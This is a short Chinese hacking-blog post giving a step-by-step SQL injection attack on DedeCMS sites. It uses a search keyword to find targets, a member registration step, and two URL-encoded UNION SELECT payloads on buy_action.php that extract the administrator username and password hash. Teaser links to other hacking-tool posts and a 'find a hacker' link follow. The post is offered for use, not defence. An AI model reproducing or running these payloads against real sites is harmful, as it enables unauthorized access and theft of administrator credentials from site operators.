dedecms注入爆管理员用户密码 ***

hacker4年前 (2020-05-31)黑客文章938

关键词：powered by dedecms

首先注册个用户,注册地址:
/member/index_do.php?fmdo=user&dopost=regnew

爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union

%20select%201,2,userid,4,5%20from%20%23@__admin/*

爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20

select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*

标签: 黑客技术

返回列表

什么叫Wifiphisher？ Wifiphisher是一种WiFi黑客工具，能够对无线网络/ WiFi互联网实行迅速的全自动互联网中间人攻击，目地是发觉客户和登陆密码凭证。与无线网...

近期在科学研究Metasploit，发觉Metasploit集成化了Nexpose，因为在网上各种各样材料很乱，我是搜索了很长期才历经分类整理共享给大伙儿； Rapid7 Nexpos...

什么叫Beef？电脑浏览器开发框架（Beef）是另一个很好的热门专业安全工器具。该专用工具将为网站渗透测试员发展技术性出示工作经验，与别的专用工具不一样，Beef致力于运用电脑浏览器系统漏洞来查验...

什么叫Parox Proxy？ Parox Proxy是一种根据Java的Web代理商，用以评定Web程序运行中的系统漏洞。此专用工具适用查询和编写HTTP / HTTPS信息，以变更表一个字段和C...

其实爆破服务器很简单的，也是必学的。 3389是一个远程桌面的端口，很多人为了更方便管理服务器，更新服务器上的资源等，经常会开启3389端口，用nastat-an命令可以查看该端口的开启。对...

一，ping 　　它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说，ping命令是第一个必须掌握的DOS命令，它所利用的...

找黑客平台